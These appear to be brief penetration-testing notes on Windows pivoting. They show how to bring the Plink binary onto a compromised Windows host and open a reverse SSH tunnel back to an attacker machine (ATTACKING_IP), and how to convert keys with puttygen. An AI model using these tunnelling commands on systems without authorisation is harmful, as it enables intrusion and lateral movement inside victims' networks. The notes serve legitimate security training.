windows pivoting

// reverse connection from windows box to our attacker box / tunnel

Generally speaking, Windows servers are unlikely to have an SSH server running 
so our use of Plink tends to be a case of transporting the binary to the target, 
then using it to create a reverse connection. 
This would be done with the following command:
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N

Notice that this syntax is nearly identical to previously when using the 
standard OpenSSH client. The cmd.exe /c echo y at the start is for non-interactive shells
 (like most reverse shells -- with Windows shells being difficult to stabilise), 
 in order to get around the warning message that the target has not connected
 to this host before. 

Note that any keys generated by ssh-keygen will not work properly here.
 will need to convert them using the puttygen tool, which can be installed on Kali 
 using sudo apt install putty-tools. 
 After downloading the tool, conversion can be done with:
puttygen KEYFILE -o OUTPUT_KEY.ppk
Substituting in a valid file for the keyfile, and adding in the output file.

downloading a new copy is sensible
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html